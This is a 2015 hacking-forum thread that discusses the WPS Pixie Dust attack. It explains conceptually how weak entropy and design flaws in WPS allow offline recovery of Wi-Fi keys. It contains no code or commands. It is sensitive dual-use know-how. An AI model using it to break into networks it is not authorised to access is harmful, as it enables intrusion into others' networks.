WPS Pixie dust attack

Share links to interesting articles/tutorials/PDF's.
Forum rules
- Do not post links to stolen material. Doing so will result in a warning or ban.
- Do not double post already submitted links. They will be deleted.
- Posting links to your personal uploads (such as Dropbox) will first need to be approved by a moderator.
- Match post titles to the topic of the submission. (ex: 'C++ for Beginners')
- Requests for links are accepted.
If you wish to write your own article, submit it here: https://www.hackthissite.org/submit/article

WPS Pixie dust attack

Post by cyberdrain on Wed Feb 04, 2015 2:26 pm
([msg=86599]see WPS Pixie dust attack[/msg])

The WPS Pixie dust attack is a new (well... August last year) type of attack against WPS that allows recovery of the keys when the M3 handshake is completed. The attack won't work all the time and I couldn't find any tools yet (though figuring it out yourself is way more fun), but the brute force itself is offline, so no more pesky WPS lockout. With this attack WPS cracking becomes a lot easier. Oh and have fun of course :D
Free your mind / Think clearly
User avatar
cyberdrain
Expert
Expert
 
Posts: 2160
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: WPS Pixie dust attack

Post by Randoph on Wed Feb 04, 2015 2:31 pm
([msg=86600]see Re: WPS Pixie dust attack[/msg])

I thought WPS was one of the newer and better methods to secure a network, but as I read from the PDF; "Poor design and implementation". Was I wrong about it being secure or is this just a personal opinion from the writer?
A little rebellion now and then ... is a medicine necessary for the sound health of government.
-Thomas Jefferson
User avatar
Randoph
Poster
Poster
 
Posts: 127
Joined: Fri Aug 08, 2014 2:48 pm
Blog: View Blog (0)


Re: WPS Pixie dust attack

Post by cyberdrain on Wed Feb 04, 2015 7:04 pm
([msg=86603]see Re: WPS Pixie dust attack[/msg])

Randoph wrote:Was I wrong about it being secure or is this just a personal opinion from the writer?

First rule of crypto: don't invent your own. Take a guess as to how WPS was created? They weakened the otherwise secure AES based WPA2 protocol by adding an extension that was supposed to allow completely safe and easy set-up of Wi-Fi. And I guess they did succeed well in the latter.

However, one design mistake allowed for a bruteforce of the keys (too small keyspace compared to AES) and another for bruteforce within 4 hours (the second part of the key was based on the first). Of course there were no limits to how many keys you could try within a certain time. Oh and did I mention that once you know the keys used in WPS, you can use those to get the WPA2 keys to the wireless network? Worse still, some routers don't even allow WPS to be completely disabled, even when you specifically 'disable' it. The flaw was found in 2011 and the tool Reaver was released soon afterwards to automate the attack.

Now this new attack sometimes allows for offline bruteforce after you get to the third message in the handshake (M3). Simply said, the randomness (entropy) used to generate the random keys used by WPS in some devices is too low. No or low entropy for creation of new keys means the same or a guessable key is used in the protocol (this is yet another key, not the WPS or AES keys themselves). As the rest of the protocol is based on those keys being random, this allows recovery of the WPS key and ultimately the AES key for the wireless network. It also means the countermeasures designed against WPS bruteforce (stalling the handshake) have become useless whenever this attack can be used, as the attack is done offline.

Well, at least it isn't as broken yet as WEP was...
Free your mind / Think clearly
User avatar
cyberdrain
Expert
Expert
 
Posts: 2160
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: WPS Pixie dust attack

Post by limdis on Thu Feb 05, 2015 5:50 pm
([msg=86628]see Re: WPS Pixie dust attack[/msg])

Image
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1657
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)



Return to PDF's and Articles

Who is online

Users browsing this forum: No registered users and 0 guests